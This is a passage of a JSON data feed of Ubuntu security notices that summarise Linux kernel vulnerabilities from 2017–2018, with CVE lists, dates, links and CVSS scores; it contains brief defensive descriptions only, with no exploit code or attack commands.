(CVE-2017-14340)\n\nChunYu Wang discovered that the iSCSI transport implementation in the Linux \nkernel did not properly validate data structures. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-14489)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not \nproperly initialize data returned to user space in some situations. A local \nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2017-14991)\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem in \nthe Linux kernel did not properly handle attempts to set reserved bits in a \ntask's extended state (xstate) area. A local attacker could use this to \ncause a denial of service (system crash). (CVE-2017-15537)\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device \ndriver in the Linux kernel contained race conditions when fetching \nfrom the ring-buffer. A local attacker could use this to cause a \ndenial of service (infinite loop). (CVE-2017-9984, CVE-2017-9985)", "edition": 6, "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "id": "USN-3469-1", "href": "https://ubuntu.com/security/notices/USN-3469-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "description": "USN-3469-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nAnthony Perard discovered that the Xen virtual block driver did not \nproperly initialize some data structures before passing them to user space. \nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. (CVE-2017-10911)\n\nBo Zhang discovered that the netlink wireless configuration interface in \nthe Linux kernel did not properly validate attributes when handling certain \nrequests. A local attacker with the CAP_NET_ADMIN could use this to cause a \ndenial of service (system crash). (CVE-2017-12153)\n\nIt was discovered that the nested KVM implementation in the Linux \nkernel in some situations did not properly prevent second level guests \nfrom reading and writing the hardware CR8 register. A local attacker \nin a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux kernel \ndid not properly restrict key reads on negatively instantiated keys. A \nlocal attacker could use this to cause a denial of service (system crash). \n(CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs interface \nfor the QLogic 24xx+ series SCSI driver in the Linux kernel. A local \nprivileged attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14051)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux \nkernel did not properly initialize a data structure returned to user space. \nA local attacker could use this to expose sensitive information (kernel \nmemory). (CVE-2017-14156)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14340)\n\nChunYu Wang discovered that the iSCSI transport implementation in the Linux \nkernel did not properly validate data structures. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-14489)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not \nproperly initialize data returned to user space in some situations. A local \nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2017-14991)\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem in \nthe Linux kernel did not properly handle attempts to set reserved bits in a \ntask's extended state (xstate) area. A local attacker could use this to \ncause a denial of service (system crash). (CVE-2017-15537)\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device \ndriver in the Linux kernel contained race conditions when fetching \nfrom the ring-buffer. A local attacker could use this to cause a \ndenial of service (infinite loop). (CVE-2017-9984, CVE-2017-9985)", "edition": 5, "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "id": "USN-3469-2", "href": "https://ubuntu.com/security/notices/USN-3469-2", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:24:24", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16525", "CVE-2017-12188", "CVE-2017-14489", "CVE-2017-15265", "CVE-2017-15649", "CVE-2017-16527", "CVE-2017-15537", "CVE-2017-16526", "CVE-2017-16533", "CVE-2017-12192", "CVE-2017-14156", "CVE-2017-1000255", "CVE-2017-16529", "CVE-2017-12153", "CVE-2017-16531", "CVE-2017-16534", "CVE-2017-14954", "CVE-2017-12154", "CVE-2017-16530", "CVE-2017-12190"], "description": "It was discovered that the KVM subsystem in the Linux kernel did not \nproperly keep track of nested levels in guest page tables. A local attacker \nin a guest VM could use this to cause a denial of service (host OS crash) \nor possibly execute arbitrary code in the host OS. (CVE-2017-12188)\n\nIt was discovered that on the PowerPC architecture, the kernel did not \nproperly sanitize the signal stack when handling sigreturn(). A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-1000255)\n\nBo Zhang discovered that the netlink wireless configuration interface in \nthe Linux kernel did not properly validate attributes when handling certain \nrequests. A local attacker with the CAP_NET_ADMIN could use this to cause a \ndenial of service (system crash). (CVE-2017-12153)\n\nIt was discovered that the nested KVM implementation in the Linux kernel in \nsome situations did not properly prevent second level guests from reading \nand writing the hardware CR8 register. A local attacker in a guest could \nuse this to cause a denial of service (system crash). (CVE-2017-12154)\n\nVitaly Mayatskikh discovered that the SCSI subsystem in the Linux kernel \ndid not properly track reference counts when merging buffers. A local \nattacker could use this to cause a denial of service (memory exhaustion). \n(CVE-2017-12190)\n\nIt was discovered that the key management subsystem in the Linux kernel did \nnot properly restrict key reads on negatively instantiated keys. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-12192)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux \nkernel did not properly initialize a data structure returned to user space. \nA local attacker could use this to expose sensitive information (kernel \nmemory). (CVE-2017-14156)\n\nChunYu Wang discovered that the iSCSI transport implementation in the Linux \nkernel did not properly validate data structures. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-14489)\n\nAlexander Potapenko discovered an information leak in the waitid \nimplementation of the Linux kernel. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2017-14954)\n\nIt was discovered that a race condition existed in the ALSA subsystem of \nthe Linux kernel when creating and deleting a port via ioctl(). A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-15265)\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem in \nthe Linux kernel did not properly handle attempts to set reserved bits in a \ntask's extended state (xstate) area. A local attacker could use this to \ncause a denial of service (system crash). (CVE-2017-15537)\n\nIt was discovered that a race condition existed in the packet fanout \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-15649)\n\nAndrey Konovalov discovered a use-after-free vulnerability in the USB \nserial console driver in the Linux kernel. A physically proximate attacker \ncould use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2017-16525)\n\nAndrey Konovalov discovered that the Ultra Wide Band driver in the Linux \nkernel did not properly check for an error condition. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash) or possibly execute arbitrary code. (CVE-2017-16526)\n\nAndrey Konovalov discovered that the ALSA subsystem in the Linux kernel \ncontained a use-after-free vulnerability. A local attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-16527)\n\nAndrey Konovalov discovered that the ALSA subsystem in the Linux kernel did \nnot properly validate USB audio buffer descriptors. A physically proximate \nattacker could use this cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-16529)\n\nAndrey Konovalov discovered that the USB unattached storage driver in the \nLinux kernel contained out-of-bounds error when handling alternative \nsettings. A physically proximate attacker could use to cause a denial of \nservice (system crash) or possibly execute arbitrary code. (CVE-2017-16530)\n\nAndrey Konovalov discovered that the USB subsystem in the Linux kernel did \nnot properly validate USB interface association descriptors. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16531)\n\nAndrey Konovalov discovered that the USB subsystem in the Linux kernel did \nnot properly validate USB HID descriptors. A physically proximate attacker \ncould use this to cause a denial of service (system crash). \n(CVE-2017-16533)\n\nAndrey Konovalov discovered that the USB subsystem in the Linux kernel did \nnot properly validate CDC metadata. A physically proximate attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16534)", "edition": 6, "modified": "2017-11-21T00:00:00", "published": "2017-11-21T00:00:00", "id": "USN-3487-1", "href": "https://ubuntu.com/security/notices/USN-3487-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:42:50", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-1000252", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663"], "description": "USN-3468-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.04. \nThis update provides the corresponding updates for the Linux Hardware \nEnablement (HWE) kernel from Ubuntu 17.04 for Ubuntu 16.04 LTS.\n\nIt was discovered that the KVM subsystem in the Linux kernel did not \nproperly bound guest IRQs. A local attacker in a guest VM could use this to \ncause a denial of service (host system crash). (CVE-2017-1000252)\n\nIt was discovered that the Flash-Friendly File System (f2fs) implementation \nin the Linux kernel did not properly validate superblock metadata. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not \nproperly initialize some data structures before passing them to user space. \nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. (CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the POSIX \nmessage queue implementation in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14340)", "edition": 6, "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "id": "USN-3468-2", "href": "https://ubuntu.com/security/notices/USN-3468-2", "title": "Linux kernel (HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T01:35:46", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-1000252", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663"], "description": "It was discovered that the KVM subsystem in the Linux kernel did not \nproperly bound guest IRQs. A local attacker in a guest VM could use this to \ncause a denial of service (host system crash). (CVE-2017-1000252)\n\nIt was discovered that the Flash-Friendly File System (f2fs) implementation \nin the Linux kernel did not properly validate superblock metadata. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not \nproperly initialize some data structures before passing them to user space. \nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. (CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the POSIX \nmessage queue implementation in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14340)", "edition": 7, "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "id": "USN-3468-1", "href": "https://ubuntu.com/security/notices/USN-3468-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:40:42", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-1000252", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663"], "description": "It was discovered that the KVM subsystem in the Linux kernel did not \nproperly bound guest IRQs. A local attacker in a guest VM could use this to \ncause a denial of service (host system crash). (CVE-2017-1000252)\n\nIt was discovered that the Flash-Friendly File System (f2fs) implementation \nin the Linux kernel did not properly validate superblock metadata. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not \nproperly initialize some data structures before passing them to user space. \nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. (CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the POSIX \nmessage queue implementation in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14340)", "edition": 6, "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "id": "USN-3468-3", "href": "https://ubuntu.com/security/notices/USN-3468-3", "title": "Linux kernel (GCP) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:39:02", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14051", "CVE-2017-17450", "CVE-2017-16525", "CVE-2017-14489", "CVE-2017-15274", "CVE-2018-5333", "CVE-2017-7889", "CVE-2017-0861", "CVE-2018-5344", "CVE-2017-15115", "CVE-2017-14140", "CVE-2017-8824", "CVE-2017-12192", "CVE-2017-1000407", "CVE-2017-15102", "CVE-2017-14156", "CVE-2017-5669", "CVE-2017-12153", "CVE-2017-15868", "CVE-2017-7542", "CVE-2017-18017", "CVE-2017-12190", "CVE-2017-0750", "CVE-2017-17806"], "description": "USN-3583-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 ESM.\n\nIt was discovered that an out-of-bounds write vulnerability existed in the \nFlash-Friendly File System (f2fs) in the Linux kernel. An attacker could \nconstruct a malicious file system that, when mounted, could cause a denial \nof service (system crash) or possibly execute arbitrary code. \n(CVE-2017-0750)\n\nIt was discovered that a race condition leading to a use-after-free \nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel allowed \npassthrough of the diagnostic I/O port 0x80. An attacker in a guest VM \ncould use this to cause a denial of service (system crash) in the host OS. \n(CVE-2017-1000407)\n\nBo Zhang discovered that the netlink wireless configuration interface in \nthe Linux kernel did not properly validate attributes when handling certain \nrequests. A local attacker with the CAP_NET_ADMIN could use this to cause a \ndenial of service (system crash). (CVE-2017-12153)\n\nVitaly Mayatskikh discovered that the SCSI subsystem in the Linux kernel \ndid not properly track reference counts when merging buffers. A local \nattacker could use this to cause a denial of service (memory exhaustion). \n(CVE-2017-12190)\n\nIt was discovered that the key management subsystem in the Linux kernel did \nnot properly restrict key reads on negatively instantiated keys. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs interface \nfor the QLogic 24xx+ series SCSI driver in the Linux kernel. A local \nprivileged attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14051)\n\nOtto Ebeling discovered that the memory manager in the Linux kernel did not \nproperly check the effective UID in some situations. A local attacker could \nuse this to expose sensitive information. (CVE-2017-14140)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux \nkernel did not properly initialize a data structure returned to user space. \nA local attacker could use this to expose sensitive information (kernel \nmemory). (CVE-2017-14156)\n\nChunYu Wang discovered that the iSCSI transport implementation in the Linux \nkernel did not properly validate data structures. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-14489)\n\nJames Patrick-Evans discovered a race condition in the LEGO USB Infrared \nTower driver in the Linux kernel. A physically proximate attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-15102)\n\nChunYu Wang discovered that a use-after-free vulnerability existed in the \nSCTP protocol implementation in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code, (CVE-2017-15115)\n\nIt was discovered that the key management subsystem in the Linux kernel did \nnot properly handle NULL payloads with non-zero length values. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-15274)\n\nIt was discovered that the Bluebooth Network Encapsulation Protocol (BNEP) \nimplementation in the Linux kernel did not validate the type of socket \npassed in the BNEPCONNADD ioctl(). A local attacker with the CAP_NET_ADMIN \nprivilege could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-15868)\n\nAndrey Konovalov discovered a use-after-free vulnerability in the USB \nserial console driver in the Linux kernel. A physically proximate attacker \ncould use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2017-16525)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf) \nmodule did not properly perform access control checks. A local attacker \ncould improperly modify the systemwide OS fingerprint list. \n(CVE-2017-17450)\n\nIt was discovered that the HMAC implementation did not validate the state \nof the underlying cryptographic hash algorithm. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-17806)\n\nDenys Fedoryshchenko discovered a use-after-free vulnerability in the \nnetfilter xt_TCPMSS filter of the Linux kernel. A remote attacker could use \nthis to cause a denial of service (system crash). (CVE-2017-18017)\n\nGareth Evans discovered that the shm IPC subsystem in the Linux kernel did \nnot properly restrict mapping page zero. A local privileged attacker could \nuse this to execute arbitrary code. (CVE-2017-5669)\n\nIt was discovered that an integer overflow vulnerability existing in the \nIPv6 implementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (infinite loop). (CVE-2017-7542)\n\nTommi Rantala and Brad Spengler discovered that the memory manager in the \nLinux kernel did not properly enforce the CONFIG_STRICT_DEVMEM protection \nmechanism. A local attacker with access to /dev/mem could use this to \nexpose sensitive information or possibly execute arbitrary code. \n(CVE-2017-7889)\n\nMohamed Ghannam discovered a use-after-free vulnerability in the DCCP \nprotocol implementation in the Linux kernel. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-8824)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable \nDatagram Sockets) protocol implementation of the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-5333)\n\n\u8303\u9f99\u98de discovered that a race condition existed in loop block device \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2018-5344)", "edition": 6, "modified": "2018-02-23T00:00:00", "published": "2018-02-23T00:00:00", "id": "USN-3583-2", "href": "https://ubuntu.com/security/notices/USN-3583-2", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:33:36", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14051", "CVE-2017-5754", "CVE-2017-17450", "CVE-2017-16525", "CVE-2017-14489", "CVE-2017-15274", "CVE-2018-5333", "CVE-2017-7889", "CVE-2017-0861", "CVE-2018-5344", "CVE-2017-15115", "CVE-2017-14140", "CVE-2017-8824", "CVE-2017-12192", "CVE-2017-1000407", "CVE-2017-15102", "CVE-2017-14156", "CVE-2017-5669", "CVE-2017-12153", "CVE-2017-15868", "CVE-2017-7542", "CVE-2017-18017", "CVE-2017-12190", "CVE-2017-0750", "CVE-2017-17806"], "description": "It was discovered that an out-of-bounds write vulnerability existed in the \nFlash-Friendly File System (f2fs) in the Linux kernel. An attacker could \nconstruct a malicious file system that, when mounted, could cause a denial \nof service (system crash) or possibly execute arbitrary code. \n(CVE-2017-0750)\n\nIt was discovered that a race condition leading to a use-after-free \nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel allowed \npassthrough of the diagnostic I/O port 0x80. An attacker in a guest VM \ncould use this to cause a denial of service (system crash) in the host OS. \n(CVE-2017-1000407)\n\nBo Zhang discovered that the netlink wireless configuration interface in \nthe Linux kernel did not properly validate attributes when handling certain \nrequests. A local attacker with the CAP_NET_ADMIN could use this to cause a \ndenial of service (system crash). (CVE-2017-12153)\n\nVitaly Mayatskikh discovered that the SCSI subsystem in the Linux kernel \ndid not properly track reference counts when merging buffers. A local \nattacker could use this to cause a denial of service (memory exhaustion). \n(CVE-2017-12190)\n\nIt was discovered that the key management subsystem in the Linux kernel did \nnot properly restrict key reads on negatively instantiated keys. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs interface \nfor the QLogic 24xx+ series SCSI driver in the Linux kernel. A local \nprivileged attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14051)\n\nOtto Ebeling discovered that the memory manager in the Linux kernel did not \nproperly check the effective UID in some situations. A local attacker could \nuse this to expose sensitive information. (CVE-2017-14140)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux \nkernel did not properly initialize a data structure returned to user space. \nA local attacker could use this to expose sensitive information (kernel \nmemory). (CVE-2017-14156)\n\nChunYu Wang discovered that the iSCSI transport implementation in the Linux \nkernel did not properly validate data structures. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-14489)\n\nJames Patrick-Evans discovered a race condition in the LEGO USB Infrared \nTower driver in the Linux kernel. A physically proximate attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-15102)\n\nChunYu Wang discovered that a use-after-free vulnerability existed in the \nSCTP protocol implementation in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code, (CVE-2017-15115)\n\nIt was discovered that the key management subsystem in the Linux kernel did \nnot properly handle NULL payloads with non-zero length values. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-15274)\n\nIt was discovered that the Bluebooth Network Encapsulation Protocol (BNEP) \nimplementation in the Linux kernel did not validate the type of socket \npassed in the BNEPCONNADD ioctl(). A local attacker with the CAP_NET_ADMIN \nprivilege could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-15868)\n\nAndrey Konovalov discovered a use-after-free vulnerability in the USB \nserial console driver in the Linux kernel. A physically proximate attacker \ncould use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2017-16525)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf) \nmodule did not properly perform access control checks. A local attacker \ncould improperly modify the system-wide OS fingerprint list. \n(CVE-2017-17450)\n\nIt was discovered that the HMAC implementation did not validate the state \nof the underlying cryptographic hash algorithm. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-17806)\n\nDenys Fedoryshchenko discovered a use-after-free vulnerability in the \nnetfilter xt_TCPMSS filter of the Linux kernel. A remote attacker could use \nthis to cause a denial of service (system crash). (CVE-2017-18017)\n\nGareth Evans discovered that the shm IPC subsystem in the Linux kernel did \nnot properly restrict mapping page zero. A local privileged attacker could \nuse this to execute arbitrary code. (CVE-2017-5669)\n\nIt was discovered that an integer overflow vulnerability existing in the \nIPv6 implementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (infinite loop). (CVE-2017-7542)\n\nTommi Rantala and Brad Spengler discovered that the memory manager in the \nLinux kernel did not properly enforce the CONFIG_STRICT_DEVMEM protection \nmechanism. A local attacker with access to /dev/mem could use this to \nexpose sensitive information or possibly execute arbitrary code. \n(CVE-2017-7889)\n\nMohamed Ghannam discovered a use-after-free vulnerability in the DCCP \nprotocol implementation in the Linux kernel. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-8824)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable \nDatagram Sockets) protocol implementation of the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-5333)\n\n\u8303\u9f99\u98de discovered that a race condition existed in loop block device \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2018-5344)\n\nUSN-3524-1 mitigated CVE-2017-5754 (Meltdown) for the amd64 \narchitecture in Ubuntu 14.04 LTS. This update provides the \ncorresponding mitigations for the ppc64el architecture. Original \nadvisory details:\n\nJann Horn discovered that microprocessors utilizing speculative execution \nand indirect branch prediction may allow unauthorized memory reads via \nsidechannel attacks. This flaw is known as Meltdown. A local attacker could \nuse this to expose sensitive information, including kernel memory. \n(CVE-2017-5754)", "edition": 5, "modified": "2018-02-23T00:00:00", "published": "2018-02-23T00:00:00", "id": "USN-3583-1", "href": "https://ubuntu.com/security/notices/USN-3583-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:38:09", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15265", "CVE-2018-7755", "CVE-2017-12193", "CVE-2018-6927", "CVE-2018-7757", "CVE-2018-1130", "CVE-2018-3665", "CVE-2018-5750", "CVE-2017-12154", "CVE-2018-5803"], "description": "It was discovered that the nested KVM implementation in the Linux kernel in \nsome situations did not properly prevent second level guests from reading \nand writing the hardware CR8 register. A local attacker in a guest could \nuse this to cause a denial of service (system crash). (CVE-2017-12154)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nIt was discovered that a race condition existed in the ALSA subsystem of \nthe Linux kernel when creating and deleting a port via ioctl(). A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-15265)\n\nIt was discovered that a null pointer dereference vulnerability existed in \nthe DCCP protocol implementation in the Linux kernel. A local attacker \ncould use this to cause a denial of service (system crash). (CVE-2018-1130)\n\nJulian Stecklina and Thomas Prescher discovered that FPU register states \n(such as MMX, SSE, and AVX registers) which are lazily restored are \npotentially vulnerable to a side channel attack. A local attacker could use \nthis to expose sensitive information. (CVE-2018-3665)\n\nWang Qize discovered that an information disclosure vulnerability existed \nin the SMBus driver for ACPI Embedded Controllers in the Linux kernel. A \nlocal attacker could use this to expose sensitive information (kernel \npointer addresses). (CVE-2018-5750)\n\nIt was discovered that the SCTP Protocol implementation in the Linux kernel \ndid not properly validate userspace provided payload lengths in some \nsituations. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2018-5803)\n\nIt was discovered that an integer overflow error existed in the futex \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash). (CVE-2018-6927)\n\nIt was discovered that an information leak vulnerability existed in the \nfloppy driver in the Linux kernel. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2018-7755)\n\nIt was discovered that a memory leak existed in the SAS driver subsystem of \nthe Linux kernel. A local attacker could use this to cause a denial of \nservice (memory exhaustion). (CVE-2018-7757)", "edition": 5, "modified": "2018-07-02T00:00:00", "published": "2018-07-02T00:00:00", "id": "USN-3698-1", "href": "https://ubuntu.com/security/notices/USN-3698-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:41:49", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15265", "CVE-2018-7755", "CVE-2017-12193", "CVE-2018-6927", "CVE-2018-7757", "CVE-2018-1130", "CVE-2018-3665", "CVE-2018-5750", "CVE-2017-12154", "CVE-2018-5803"], "description": "USN-3698-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 ESM.\n\nIt was discovered that the nested KVM implementation in the Linux kernel in \nsome situations did not properly prevent second level guests from reading \nand writing the hardware CR8 register. A local attacker in a guest could \nuse this to cause a denial of service (system crash). (CVE-2017-12154)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nIt was discovered that a race condition existed in the ALSA subsystem of \nthe Linux kernel when creating and deleting a port via ioctl(). A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-15265)\n\nIt was discovered that a null pointer dereference vulnerability existed in \nthe DCCP protocol implementation in the Linux kernel. A local attacker \ncould use this to cause a denial of service (system crash). (CVE-2018-1130)\n\nJulian Stecklina and Thomas Prescher discovered that FPU register states \n(such as MMX, SSE, and AVX registers) which are lazily restored are \npotentially vulnerable to a side channel attack. A local attacker could use \nthis to expose sensitive information. (CVE-2018-3665)\n\nWang Qize discovered that an information disclosure vulnerability existed \nin the SMBus driver for ACPI Embedded Controllers in the Linux kernel. A \nlocal attacker could use this to expose sensitive information (kernel \npointer addresses). (CVE-2018-5750)\n\nIt was discovered that the SCTP Protocol implementation in the Linux kernel \ndid not properly validate userspace provided payload lengths in some \nsituations. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2018-5803)\n\nIt was discovered that an integer overflow error 